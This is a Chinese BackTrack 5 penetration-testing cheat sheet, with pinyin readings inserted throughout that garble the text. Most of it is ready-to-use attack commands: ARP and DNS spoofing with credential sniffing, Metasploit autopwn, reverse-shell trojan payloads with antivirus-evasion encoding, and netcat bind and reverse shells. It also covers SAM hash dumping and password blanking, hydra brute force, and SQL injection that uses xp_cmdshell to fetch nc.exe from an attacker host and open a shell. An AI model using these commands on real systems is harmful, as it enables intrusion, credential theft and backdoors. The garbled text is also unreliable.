BackTrack渗透测(cè)试笔记是一款BT5学习笔(bǐ)记,使用(yòng)BT5的同学可以(yǐ)看(kàn)看,不仅仅是用来破解WIFI,BT5还有更强大的(de)功能。 体积小,但功能强大。界面非常清爽(shuǎng),简单易操作。
0x01.1 PTES 标准中的渗(shèn)透测试(shì)阶段
0x01.1.1 前期交互阶段
0x01.1.2 情报搜集(jí)阶段
0x01.1.3 威胁建模阶段
0x01.1.4 漏洞(dòng)分析阶段(duàn)
0x01.1.5 渗透攻击阶段(duàn)
0x01.1.6 后渗透攻(gōng)击阶段
0x01.1.7 报(bào)告阶(jiē)段
0x01.2 渗透测试(shì)类型
0x01.2.1 白盒测试
0x01.2.2 黑盒测试(shì)
0x01.3 小结
0x02 渗(shèn)透环境搭建
>
0x03 常用信息收集
0x03.1 被动(dòng)信息收集
0x03.2 主动信息收集(jí)
0x03.3 针对性(xìng)扫描
0x03.4 小结(jié)
0x04 信息(xī)收集的附属工作
0x04.1 基本的(de)漏洞(dòng)扫(sǎo)描
0x04.2 使用 Nessus 进行(háng)扫(sǎo)描
0x04.3 专用漏洞扫描器(qì)
0x05 社会工程学攻击
0x05.1 针对性的(de)钓鱼攻击
0x05.2 web 向量攻击
0x05.3 SET 的其他特性
0x05.4 小结。
ping 域名(míng)/ip 测试本(běn)机到远端主机是否联通(tōng)。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名 dns服务器 传输zone。
扫描
nmap:
-sS 半开扫描(miáo)TCP和(hé)SYN扫描(miáo)。
-sT 完全(quán)TCP连(lián)接扫描(miáo)。
-sU UDP扫描
-PS syn包探测(防火墙探测(cè))
-PA ack包探(tàn)测(防(fáng)火墙探测(cè))
-PN 不ping。
-n 不dns解析。
-A -O和(hé)-sV。
-O 操作系统识别。
-sV 服务(wù)版本(běn)信息(banner)
-p 端口扫描。
-T 设置(zhì)时间级别(bié)(0-5)
-iL 导入扫描结果。
-oG 输出(chū)扫描(miáo)结果。
操(cāo)作(zuò)系统识别:
p0f -i eth0 -U -p 开(kāi)启混杂模式(shì)。
xprobe2 ip|域名 检测os。
banner获取(qǔ):
nc ip port 检测端口是否打开(kāi)。
telnet ip port 检(jiǎn)测端口是否打开。
wget ip 下载主页。
cat index.html | more 显示主页代码(mǎ)。
q 退出。
windows枚举
nmap -sS -p 139,445 ip 扫描(miáo)windows。
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP 检测netbioses。
smbgetserverinfo -i targetIP 扫(sǎo)描name,os,组(zǔ)。
smbdumpusers -i targetIP 列出用(yòng)户。
smbclient -L //targetIP 列出共享(xiǎng)。
使用windows:
net use \\ip\ipc$ "" /u:"" 开启空会话(huà)。
net view \\ip 显示共享信息。
smbclient:
smbclient -L hostName -I targetIP 枚(méi)举共享。
smbclient -L hostName/share -U "" 用空用户连接。
smbclient -L hostName -I targetIP -U admin普通用户连接。
rpcclient:
rpcclient targetIP -U ""打开一个空(kōng)会话(huà)。
netshareenum 枚举共(gòng)享。
enumdomusers 枚举用(yòng)户(hù)。
lsaenumsid 枚举域SID。
queryuser RID 查(chá)询(xún)用(yòng)户信息(xī)。
createdomuser 创(chuàng)建用户访问。
ARP欺骗:
ettercap:
nano /usr/local/etc/etter.conf配置文件(jiàn)
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡
Hosts > Scan for hosts (do this two times)扫描网段的主(zhǔ)机
Hosts > Hosts list 显(xiǎn)示(shì)主(zhǔ)机列表(biǎo)
Select the default gateway > Add to Target 1 添加(jiā)主机
Select the target > Add to Target 2 添(tiān)加主机(jī)
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻(gōng)击(jī)
Start > Start sniffing 开始攻击
dsniff -i eth0 监听网卡窃听(tīng)登(dēng)录用(yòng)户(hù)密码(mǎ)
urlsnarf -i eth0 嗅探http请求
msgsnarf -i eth0 嗅(xiù)探聊天软件(jiàn)的聊天内(nèi)容
driftnet -i eth0 网(wǎng)络管理嗅探(tàn)图片,音频。
dns欺骗:
nano /usr/local/share/ettercap/etter.dns编(biān)辑配置(zhì)文件
Plugins > Manage the plugins > dns_spoof 设置dns欺骗(piàn)
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
Start > Start sniffing 开(kāi)始攻击
Exploits漏洞利用:
cd /pentest/exploits/exploit-db 进入目(mù)录(lù)
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
cat exploit | grep "#include"检查运行(háng)环(huán)境
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可(kě)以在linux下运行的(de)代码
Metasploit:
svn update 升(shēng)级
./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮(bāng)助(zhù)
show <option> 显(xiǎn)示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options 显示选项
set <OPTION NAME> <option> 设(shè)置选项
show payloads 显(xiǎn)示装置
set PAYLOAD <payload name> 设置装置
show options 显示选项
set <OPTION NAME> <option> 设置选项
show targets 显(xiǎn)示目标(os版本)
set TARGET <target number> 设置(zhì)目(mù)标版本
exploit 开始漏洞攻击(jī)
sessions -l 列出会话
sessions -i <ID> 选择会(huì)话
sessions -k <ID> 结束会话
<ctrl> z 把(bǎ)会(huì)话放到后台
<ctrl> c 结束会话
jobs 列出漏洞(dòng)运行工作
jobs -K 结束一个漏(lòu)洞运行工作
show auxiliary 显示辅(fǔ)助模(mó)块
use <auxiliary name> 使用辅助模块
set <OPTION NAME> <option> 设置选项
run 运行模块
scanner/smb/version 扫描系(xì)统版本
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴(bào)力或字典)
Attacker behind firewall: bind shell正向(xiàng)
Target behind firewall: reverse shell反向
Meterpreter衔接不(bú)懂dos的可以用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载(zǎi)nmap的扫描结果
自动化(huà)攻击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字符接口攻击流(liú)程(chéng):
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
做木马后门等:
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
编码处理就(jiù)是做(zuò)免杀:
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t c
入侵(qīn)后(hòu)在windows下添加管理(lǐ)员(yuán)用户(hù):
hostname 查看主机(jī)名
net users 查看用(yòng)户
net user 用户 密码 /add 添加用户
net localgroup 查看工作组(zǔ)
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用户加入管理(lǐ)员组
TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到(dào)tftp上
tftp -i 10.1.1.2 GET nc.exe下载
netcat瑞(ruì)士军刀
attacker: 10.1.1.1
target: 10.1.1.2
nc -v -z 10.1.1.2 1-1024 端口扫描
target: nc -lvp 4444 聊天设置(zhì)(服务)
attacker: nc -v 10.1.1.2 4444 聊天设置(zhì)(客户)
target: nc -lvp 4444 > output.txt传(chuán)输(shū)文件(jiàn)(接受)
attacker: nc -v 10.1.1.2 4444 < test.txt传输(shū)文件(发送(sòng))
target: nc -lvp 4444 -e cmd.exe Bind shell。
attacker: nc -v 10.1.1.2 4444
target:nc -lvp 4444 Reverse shell。
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
密码(mǎ)
字(zì)典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示(shì)个数(30多万个)
暴力:
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
hydra -l muts -P words -v targetIP pop3 攻击pop3
hydra -P words -v targetIP snmp 攻(gōng)击snmp
攻击microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r target.com –accept=pdf 下载pdf文档
wyd.pl -o output.txt .target.com/
cat output.txt | more
SAM文(wén)件(windows下的(de)密码文(wén)件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文(wén)件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWS\system32> pwdump \\127.0.0.1
john破解密码:
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
彩虹表:
rcrack *.rt -f hash.txt
本地修改密(mì)码:
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1 挂载c盘
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份(fèn)sam文件
直(zhí)接修改sam文(wén)件:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot
SQL 注入
nmap -sS -p 1521 targetIP 扫描oracle
nmap -sS -p T:1433,U:1434 targetIP 扫描mssql
' or 1=1–验证旁路(lù)
列举表名:
' having 1=1–
' group by table having 1=1–
' group by table, table2 having 1=1–
' group by table, table2, table3 having 1=1–
列举列类型:
union select sum(column) from table –
union select sum(column2) from table –
添加(jiā)数据:
' ; insert into table values('value','value2′,'value3′)–
MSSQL存储程序:
输(shū)出(chū)数据库中备案信息到一个html文件(jiàn),您可以(yǐ)查看与一(yī)个浏览器。
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.html
运(yùn)行(háng)ipconfig在浏览器(qì)查看信息。
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txt
上传后门。
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –
攻击者: nc -lvp 53
spreadfold。
bt5,全称Back Track five,是继bt3,bt4之后的最新版。这是一个(gè)linux环境的便(biàn)携系统,可以(yǐ)放到U盘或者硬盘(pán)中(zhōng)启动,对本身(shēn)硬盘没有影响,无(wú)需在本(běn)地安装(zhuāng)。内置大量的网络安(ān)全检测工具以及黑客(kè)破解(jiě)软件等。
